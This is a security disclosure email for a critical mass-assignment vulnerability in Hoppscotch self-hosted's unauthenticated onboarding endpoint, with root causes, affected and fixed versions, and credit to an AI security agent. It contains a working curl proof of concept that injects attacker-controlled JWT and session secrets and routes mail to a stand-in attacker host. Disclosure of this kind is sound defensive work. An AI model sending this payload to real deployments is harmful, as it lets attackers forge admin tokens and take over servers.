Hello,

We are reporting a critical vulnerability in Hoppscotch, an open source
self-hosted API development platform (79,000+ GitHub stars).

CVE:      CVE-2026-50160
CVSS:     10.0 (Critical)
GHSA:     https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf
Affected: Hoppscotch self-hosted <= 2026.4.1
Fixed:    2026.5.0

Summary:

The POST /v1/onboarding/config endpoint allows an unauthenticated attacker
to inject arbitrary InfraConfig keys, including JWT_SECRET and
SESSION_SECRET, into the database via mass assignment. Four independent
weaknesses combine to enable this:

1. NestJS ValidationPipe missing whitelist:true - extra request body
   properties are not stripped
2. Object.entries(dto) iterates all properties without runtime validation
3. validateEnvValues has default:break - JWT_SECRET passes silently
4. No authentication on the onboarding endpoint

An attacker controlling JWT_SECRET can forge tokens for any user including
admin, resulting in full server compromise. The attack works on any fresh
Hoppscotch deployment before onboarding completes, or when re-onboarding is
enabled.

Proof of concept:

curl -X POST http://target:3170/v1/onboarding/config \
  -H "Content-Type: application/json" \
  -d '{
    "VITE_ALLOWED_AUTH_PROVIDERS": "EMAIL",
    "MAILER_SMTP_ENABLE": "true",
    "MAILER_SMTP_URL": "smtp://attacker.com:25",
    "MAILER_ADDRESS_FROM": "[email protected]",
    "JWT_SECRET": "ATTACKER_CONTROLLED_JWT_SECRET",
    "SESSION_SECRET": "ATTACKER_CONTROLLED_SESSION"
  }'

Fix:

Upgrade to Hoppscotch 2026.5.0. Full fix details and root cause analysis
in the advisory linked above.

Full writeup: https://www.offgridsec.com/blog-hoppscotch-cve-2026-50160.html

Reported by: Offgrid Security (https://offgridsec.com)
Found by:    Kira, model-agnostic autonomous AI security agent
